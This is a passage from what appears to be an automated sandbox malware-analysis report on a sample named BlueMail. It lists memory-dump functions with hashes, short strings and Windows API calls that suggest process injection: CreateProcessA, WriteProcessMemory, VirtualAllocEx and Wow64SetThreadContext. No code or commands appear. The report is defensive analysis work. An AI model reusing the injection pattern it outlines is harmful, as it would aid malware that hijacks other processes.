Instruction Fuzzy Hash: 525179747403108FDB69AF68D494A2EBBF2EF89200715447EE816DB3A1DF35AC46CB91

Function 0604A040 Relevance: 2.6, Strings: 2, Instructions: 133COMMON

Download Yara Rule

Strings

4'q, xrefs: 0604A114
pq, xrefs: 0604A1E7

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: 4'q$pq
API String ID: 0-2294260830
Opcode ID: 6aa9bdfeccdacfa55b258a1a3254ee5e1bb4324a34ed0c45234aede521233847
Instruction ID: 972509938fa6f2d8e35c71ac2d2c879d54da6ab45631e4927b44ad229fcca821
Opcode Fuzzy Hash: 6aa9bdfeccdacfa55b258a1a3254ee5e1bb4324a34ed0c45234aede521233847
Instruction Fuzzy Hash: 3841E471A003048FE765DB79C9807AFBBE6EF89300F148829D459DB255DB74ED06C7A1

Function 0604B960 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,q, xrefs: 0604BCDB

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: ,q
API String ID: 0-196045463
Opcode ID: 67a44cda09b80496b53a237daed5210d05729773fd940183b8744ad93ef8bb4a
Instruction ID: e58b93e17a7ca808a19792d78d4cce67ee2cc64584014d1c361617069c6f9b45
Opcode Fuzzy Hash: 67a44cda09b80496b53a237daed5210d05729773fd940183b8744ad93ef8bb4a
Instruction Fuzzy Hash: 0E52F8B5A002288FDB64DF69C981BDDBBF2AF88300F1545E9E549AB351DB309D81CF61

Function 06045E90 Relevance: 1.8, Strings: 1, Instructions: 541COMMON

Download Yara Rule

Strings

(_q, xrefs: 06046130

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: (_q
API String ID: 0-3590916094
Opcode ID: 64b4af45c5ad539af941adf8502d0416c982b8cf5e56fb6a3f498b73e09f8cb7
Instruction ID: 3072babb122be41759e0c136b7e48b7081f358f445f00d75f4c7270a045a227b
Opcode Fuzzy Hash: 64b4af45c5ad539af941adf8502d0416c982b8cf5e56fb6a3f498b73e09f8cb7
Instruction Fuzzy Hash: 86227D75A50214DFDB54EF64D890A6DBBF2FF89300F188069E9059B3A1DB76EC81CB90

Function 06140F20 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06141187

Memory Dump Source

Source File: 0000000E.00000002.2329956122.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: true

Associated: 0000000E.00000002.2329718072.00000000060F0000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60f0000_BlueMail.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d36d1747ec74a5913ccdb02133513b7ed585a5f10b33b15422c5530fef41c2ba
Instruction ID: 492fd9e4294cabdbb784912ee539876912b14aa5b0327ae75384f0b49faf3340
Opcode Fuzzy Hash: d36d1747ec74a5913ccdb02133513b7ed585a5f10b33b15422c5530fef41c2ba
Instruction Fuzzy Hash: 31A1F270D00258DFDB50DFA9D886BEDBBF1BB09310F14956AE858E7280DB748985CF85

Function 060E59E5 Relevance: 1.7, APIs: 1, Instructions: 177fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 060E5B6B

Memory Dump Source

Source File: 0000000E.00000002.2329668242.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60e0000_BlueMail.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 8419f55660ae19f64b13791177017b2b5d986106e3e591dc1249fed12c5e3697
Instruction ID: b56207c0e31ec6dde12c3e8123679a105b775928672535f1f0e83cf63635f2a3
Opcode Fuzzy Hash: 8419f55660ae19f64b13791177017b2b5d986106e3e591dc1249fed12c5e3697
Instruction Fuzzy Hash: 8E612370D40328DFDB54CFA9C885BEEBBF1BB49304F248929E814AB280DB758981CF55

Function 060E59F0 Relevance: 1.7, APIs: 1, Instructions: 169fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 060E5B6B

Memory Dump Source

Source File: 0000000E.00000002.2329668242.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60e0000_BlueMail.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: fa406bebd2304d62ac84f086375d3e76c65bdc150914226f3a0f061d46a64359
Instruction ID: 1ff3de3a143efae83ec39fd0703b6a6cff92de17387fea2251f2007086c43ce2
Opcode Fuzzy Hash: fa406bebd2304d62ac84f086375d3e76c65bdc150914226f3a0f061d46a64359
Instruction Fuzzy Hash: 8E611370D40328DFDB55CFA9C8857EEBBF1BB49304F248929E815AB280DB758981CF55

Function 06142598 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0614266B

Memory Dump Source

Source File: 0000000E.00000002.2329956122.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: true

Associated: 0000000E.00000002.2329718072.00000000060F0000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60f0000_BlueMail.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f82049a223455f51446e51ba82c7675ccd159bb3843b5d95d4ff7349fecd89f1
Instruction ID: 59e8dbf2a4290298c13976c66a0d001d8ed6e2fa7524871850e5c972d136305e
Opcode Fuzzy Hash: f82049a223455f51446e51ba82c7675ccd159bb3843b5d95d4ff7349fecd89f1
Instruction Fuzzy Hash: 4C41BAB5D012589FDF14CFA9D984AEEFBF1BB09310F10942AE818B7200C735AA41CF64

Function 06141E90 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06141F3A

Memory Dump Source

Source File: 0000000E.00000002.2329956122.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: true

Associated: 0000000E.00000002.2329718072.00000000060F0000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60f0000_BlueMail.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 502b2b8633466d6d895719c04a3119c98556ab347466bf3f07a13b18f373ba27
Instruction ID: ec1ba3e35f40ba5bade00b2af0237f0ff22bd988efc6b4a75b1c92dfc97ec1a6
Opcode Fuzzy Hash: 502b2b8633466d6d895719c04a3119c98556ab347466bf3f07a13b18f373ba27
Instruction Fuzzy Hash: AB3196B9D012589FCF14CFA9D980AEEBBB1EB09310F10942AE814BB200D735A946CF58

Function 032EE940 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 032EE9E4

Memory Dump Source

Source File: 0000000E.00000002.2270604509.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_32e0000_BlueMail.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9c0d15017840f06c4d977641390747a79f0da7b57e7b1d48c323d6628da1f3e5
Instruction ID: dd0d77163e144c50b357a35b95e2792650a61d791a39afc8b4f2f72b925f650f
Opcode Fuzzy Hash: 9c0d15017840f06c4d977641390747a79f0da7b57e7b1d48c323d6628da1f3e5
Instruction Fuzzy Hash: F131A8B9D002489FCB14CFAAD980ADEFBF1BB09310F14942AE814B7210D735A945CF54

Function 061417D0 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0614187F

Memory Dump Source

Source File: 0000000E.00000002.2329956122.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: true

Associated: 0000000E.00000002.2329718072.00000000060F0000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60f0000_BlueMail.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: fe4800d68e035f1bb092caa0eb7abaa10df12872fac13d4a5d3c61b1c309e5b9
Instruction ID: 17291ed56708c1976ca774d3abedffb18205dff926717657d22f377f2a8325db
Opcode Fuzzy Hash: fe4800d68e035f1bb092caa0eb7abaa10df12872fac13d4a5d3c61b1c309e5b9
Instruction Fuzzy Hash: 2331CAB4D002589FDB14DFAAD885AEEBBF0BB49310F14802AE418B7240C738A985CF94

Function 0606B4E8 Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

SleepEx.KERNELBASE(?,?), ref: 0606B582

Memory Dump Source

Source File: 0000000E.00000002.2329223681.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6060000_BlueMail.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 93bb5eafe45cc241ce842074ae64cf8e73274e2cbbca7c110854d1da04ae7db9
Instruction ID: 82c017594d55b3ccecfcb5f4bd8073ae8fc97192dbea3be4c2a726f7898b4079
Opcode Fuzzy Hash: 93bb5eafe45cc241ce842074ae64cf8e73274e2cbbca7c110854d1da04ae7db9
Instruction Fuzzy Hash: E131CBB5D012589FDB10CFAAE980AEEFBF5AB49310F14942AE815B7240C735A945CFA4

Function 0606B4F0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SleepEx.KERNELBASE(?,?), ref: 0606B582

Memory Dump Source

Source File: 0000000E.00000002.2329223681.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6060000_BlueMail.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ac64dec3d660a8efa456f28615316906d5596573c1d0891eb32f6bb64f307289
Instruction ID: 5e2b31dcda128ba0a849b1a881748f2a398f616bfb3d97e82dcdebedef9e5881
Opcode Fuzzy Hash: ac64dec3d660a8efa456f28615316906d5596573c1d0891eb32f6bb64f307289
Instruction Fuzzy Hash: A031C9B5D01258DFDB10CFAAD980AEEFBF5AF49310F14942AE814B7240C739A941CFA4

Function 0604B950 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

,q, xrefs: 0604BCDB

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: ,q
API String ID: 0-196045463
Opcode ID: 1af7e761aef75a7a68b890343fbb3765d232c5244e9667677c3d6384ece96afc
Instruction ID: a7840923eaf2c524444a92b2ca4fd069c342570323498472a6dd6fdb314e3143
Opcode Fuzzy Hash: 1af7e761aef75a7a68b890343fbb3765d232c5244e9667677c3d6384ece96afc
Instruction Fuzzy Hash: B3C12F75A002289FDB68DB69C985BDDBBF6EF88700F158099E509AB350DB30DD81CF61

Function 0604F5F0 Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

(q, xrefs: 0604F8A4

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: 1dd4397727abf2f53069237fdd5588423cf8f14d17fa5afb51cd947f0f33bcd0
Instruction ID: 29649c0181edde62083328fc6e2747004059e1be35d7b0ca3c25cd7568842526
Opcode Fuzzy Hash: 1dd4397727abf2f53069237fdd5588423cf8f14d17fa5afb51cd947f0f33bcd0
Instruction Fuzzy Hash: 1CA1A1767402009FDB659F64D954F6A7BF2EFC8300B1580A9E5058F7A2CB35EC42DB91

Function 0604AA78 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

4'q, xrefs: 0604ACA2

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: a4cba8413ee607d1fcf69946b1f84fec91f84d397077b9127353d9536917f95a
Instruction ID: 55723283bb17131f4f813c772ea1c379becec3291c4c78777e844a444de284ff
Opcode Fuzzy Hash: a4cba8413ee607d1fcf69946b1f84fec91f84d397077b9127353d9536917f95a
Instruction Fuzzy Hash: 98A11D74B50218CFCB54EFA4D994A9DBBB2FF88300F158168E416AB365DF70AC42CB50

Function 06040670 Relevance: 1.4, Strings: 1, Instructions: 185COMMON

Download Yara Rule

Strings

pq, xrefs: 060407B8

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: pq
API String ID: 0-153521182
Opcode ID: 8d73d4fc26fa6e3f2beebb2c5ed553d4c218a64df9c8d5fb9c3337d5a9fe6203
Instruction ID: 6f28bc962cc034d4882efb2be0d282c9490caa86fba722ed5790492d55d9d4a8
Opcode Fuzzy Hash: 8d73d4fc26fa6e3f2beebb2c5ed553d4c218a64df9c8d5fb9c3337d5a9fe6203
Instruction Fuzzy Hash: 0A6160766002009FDB569FA8C804E297FF2FF8D31071944A9E24ADB272DB36DC52DB51

Function 05A68950 Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

TJq, xrefs: 05A68A38

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID: TJq
API String ID: 0-48878262
Opcode ID: d4e0c172048c2105519481a8fc67bfd3adc4c4c5f8bf257aac7119e9efd59289
Instruction ID: c3deaa38b36136daa3ed2b78131e291e821b6c57e5668c2092eed96d0a2dfc1d
Opcode Fuzzy Hash: d4e0c172048c2105519481a8fc67bfd3adc4c4c5f8bf257aac7119e9efd59289
Instruction Fuzzy Hash: 9A71E178E00208DFDB04DFA8E554AAEBBF6FB88301F108029E915A7384DB785995CF91

Function 05A68960 Relevance: 1.4, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

TJq, xrefs: 05A68A38

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID: TJq
API String ID: 0-48878262
Opcode ID: f2828af68c1c07febeae9b23eb08c88586b7372478eb52cd55c1fcf72ec7d123
Instruction ID: d255a6b21dd0b40868f6cd0107ca9913d815026cb6fd73d65bb2ad818fa1ca93
Opcode Fuzzy Hash: f2828af68c1c07febeae9b23eb08c88586b7372478eb52cd55c1fcf72ec7d123
Instruction Fuzzy Hash: 0B71D278E00208DFDB04DFA9D554AAEBBF6FB8C301F108429E915A7384DB785995CF91

Function 060416C8 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

(q, xrefs: 0604173C

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: 9511e09d7b473b367e1674ef75377edb8ece3de9be4dc3c5c82ac14bd64419f0
Instruction ID: 4000153bd01de6a6603fb282dc393972d79a2d9bb2c05cb42010b8527565e622
Opcode Fuzzy Hash: 9511e09d7b473b367e1674ef75377edb8ece3de9be4dc3c5c82ac14bd64419f0
Instruction Fuzzy Hash: 2251E376E006158FCB21EF58D484ABAFBB5FF85310B1586AAD925DB241D730F892CBD0

Function 0604CE50 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

(q, xrefs: 0604CF1B

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: 9d79fb5ed2bfed335d53e8c9cc8c32273a2a4faf250ad135eb4e58a0858f2ea7
Instruction ID: 44e314d6aa1c2c81f64a60f361ecfe04d658e08459832d0c98860715e7c276f7
Opcode Fuzzy Hash: 9d79fb5ed2bfed335d53e8c9cc8c32273a2a4faf250ad135eb4e58a0858f2ea7
Instruction Fuzzy Hash: F741D0757452148FEB98AF39C894B2E3BE6AFC9250719447AE416CB3A1DF38DC02C791

Function 0604E71A Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

4'q, xrefs: 0604E762

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 70c8f9b9291fd33e74424d21826251772e71c13842522b3a4bbf1e440b59099a
Instruction ID: c11a952dde1d99e9dc185f72a5b5649e1aaedca370e9c40462dd27c2c19d29e2
Opcode Fuzzy Hash: 70c8f9b9291fd33e74424d21826251772e71c13842522b3a4bbf1e440b59099a
Instruction Fuzzy Hash: 3F41C3B0B502148FDB95FB64C854AAEBBBAEFC8600F10442DD416AB398CF709C46CB91

Function 05A6FDC0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

Hq, xrefs: 05A6FE2B

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID: Hq
API String ID: 0-1594803414
Opcode ID: 9514879c5e18c11aee0b9b94fa2f8c992354e20b7fba04789a3c8cbffb237209
Instruction ID: e0eab6e83a2d65dc0fbe246e8f2b53607fd7d7412fa539281ad033e01bd4c503
Opcode Fuzzy Hash: 9514879c5e18c11aee0b9b94fa2f8c992354e20b7fba04789a3c8cbffb237209
Instruction Fuzzy Hash: 16318E36B006149FDB15DF68D844DAA7BB3FF89710B0644A9E605AF376CA31EC16CB90

Function 05E87B18 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

S?h], xrefs: 05E87BE3

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID: S?h]
API String ID: 0-1865748763
Opcode ID: 6ce77366e2aa33663bd131ee7171b72d7dfa19eecf2a120bea3b0f1bdca248d1
Instruction ID: e9f902d5b979c11210a5e1874577d7010bc52a70afb4b51a5ff22903172c0a69
Opcode Fuzzy Hash: 6ce77366e2aa33663bd131ee7171b72d7dfa19eecf2a120bea3b0f1bdca248d1
Instruction Fuzzy Hash: 2451B374D01208DFDB58EFA9D594AADBBB2FF48304F20902AD41AAB365DB319981CF50

Function 05E87B0F Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

S?h], xrefs: 05E87BE3

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID: S?h]
API String ID: 0-1865748763
Opcode ID: 9e526676037fd09d2c6dd55da2cc23e0e2c331c54bbc2bb2e8af3eed39b3de76
Instruction ID: 8c22f46ed362b27427223358dfa56d00f594f207665ba2ead387f95548e21b0c
Opcode Fuzzy Hash: 9e526676037fd09d2c6dd55da2cc23e0e2c331c54bbc2bb2e8af3eed39b3de76
Instruction Fuzzy Hash: D941C570D01208CFDB58DFB9D594AADBBB2FF89304F24912ED419AB265DB319981CF50

Function 06049AF0 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

4'q, xrefs: 06049B39

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 8b9ee17c3e0894f9b1f17283acd89d2e587942081d7d952356eb6dd33b95d6b3
Instruction ID: 70bf0fee0c08e35caef71c42f63996c142c967d9d15f31e5b8b177d25ad330ff
Opcode Fuzzy Hash: 8b9ee17c3e0894f9b1f17283acd89d2e587942081d7d952356eb6dd33b95d6b3
Instruction Fuzzy Hash: 4E31A035600214DFDF19DFA4C88499DBFF6FF8C210B0540A9E9069B362CA31DC42CB91

Function 032EFE78 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 032EFF17

Memory Dump Source

Source File: 0000000E.00000002.2270604509.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_32e0000_BlueMail.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bf83b1849c8dca6cffc7a523ee3ba8faa0c56dec7636fac7a4394c28c36c65f5
Instruction ID: b66e177dff952be9915ec30991de9d0fc75068fd2b19787aae0d82fd76db1c27
Opcode Fuzzy Hash: bf83b1849c8dca6cffc7a523ee3ba8faa0c56dec7636fac7a4394c28c36c65f5
Instruction Fuzzy Hash: 9731A9B8D10248EFCF14CFA9D980ADEFBB0AB49310F14941AE814BB210D735A941CF94

Function 060451EF Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

p<q, xrefs: 0604523A

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: p<q
API String ID: 0-3896934649
Opcode ID: c34314cbda70cae54534e04b2c7883e176bfc079a5d94c83b70646cc1509321c
Instruction ID: 4d6a8f0c84cdd6b087223289b4719b6c1592cefddb5d8d05c175d9e09402ff10
Opcode Fuzzy Hash: c34314cbda70cae54534e04b2c7883e176bfc079a5d94c83b70646cc1509321c
Instruction Fuzzy Hash: B0214C707441959FDB56DF6ACC40AAA7FE6BF8A200F0940A6FC55CB361CA35DC52CB20

Function 06040438 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

5, xrefs: 06040499

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 8d1df9d7c3b30dee892066f477693538fff18ac445c47bfe6b95cb12637a1a73
Instruction ID: 59b6f822a1051017140b0b1904d1e238e2b2792be1a7630aa2ce2db448c30e0b
Opcode Fuzzy Hash: 8d1df9d7c3b30dee892066f477693538fff18ac445c47bfe6b95cb12637a1a73
Instruction Fuzzy Hash: 3F21F775A203159FDB14DB78D4457AEBBE2EB89300F008428E45ADB680DF749D46C7E1

Function 05A71E8C Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

4'q, xrefs: 05A72659

Memory Dump Source

Source File: 0000000E.00000002.2325993005.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a70000_BlueMail.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: d4c05edb75ceeff7b645bb7c4a9ab057c0955ac6bb6d6da6023277c5a5be32b2
Instruction ID: 215157dc87fd680c144e5ce2026f39015cb6db07034f2995e62b42f936e65b1d
Opcode Fuzzy Hash: d4c05edb75ceeff7b645bb7c4a9ab057c0955ac6bb6d6da6023277c5a5be32b2
Instruction Fuzzy Hash: 75312974D04219DFDB15CFA5D804BBEBBB2FF49302F10806AD425A7251DB344A82CF95

Function 05E8BD29 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

U, xrefs: 05E8BD35

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 096da7fc4bb0b1221e7d8f6e0e355fdd676589a304e5b8135a1a0a1e8782df70
Instruction ID: 54536989699e419638a82e7329e67a4f9a0a7fb322c67a83a4d836e905eaac8a
Opcode Fuzzy Hash: 096da7fc4bb0b1221e7d8f6e0e355fdd676589a304e5b8135a1a0a1e8782df70
Instruction Fuzzy Hash: 9611B3789056188FDBA4EF28CD98AAABBB1AF48305F0051D9D40EAB360DF305E848F40

Function 05E80AE1 Relevance: 1.3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

Strings

8, xrefs: 05E80B35

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: fa2d125a54cba9830951e6a9edf0820d07efb4183c0e3938d2e8e21f79bc66ac
Instruction ID: 29c6330ba3ac5c57da1ec878403464be5d58e04b07e9e34984322f182822f382
Opcode Fuzzy Hash: fa2d125a54cba9830951e6a9edf0820d07efb4183c0e3938d2e8e21f79bc66ac
Instruction Fuzzy Hash: BDF062B492122CCFEBA0DF94D884BACB7B1BB48304F0055EA960DB2280D7745E88CF55

Function 05E80AC6 Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

v, xrefs: 05E80AD4

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID: v
API String ID: 0-1801730948
Opcode ID: b1daa9a8f36a6a8d60aea9bb6921f4a02bd368a6f08c8ec4d8f2cae2fb1878d8
Instruction ID: 17872b597e6ea9ee9ffafe810166442a09b27606203cee7665342846ca99af35
Opcode Fuzzy Hash: b1daa9a8f36a6a8d60aea9bb6921f4a02bd368a6f08c8ec4d8f2cae2fb1878d8
Instruction Fuzzy Hash: 15E0EE70C16228CBCB2ACF18C8887EDBABABB08304F0061E9A54D62280C7746B85CF44

Function 05E8C3A3 Relevance: 1.3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

Strings

8, xrefs: 05E8C3D9

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 67fa4cc053b18a6798ad18408c8f211d070972fc16ce7534e33dac1aafb5f7f9
Instruction ID: 20fd62a2ff70966694ed41f142dcd0456a48d846e0056a1cef780bc562d60696
Opcode Fuzzy Hash: 67fa4cc053b18a6798ad18408c8f211d070972fc16ce7534e33dac1aafb5f7f9
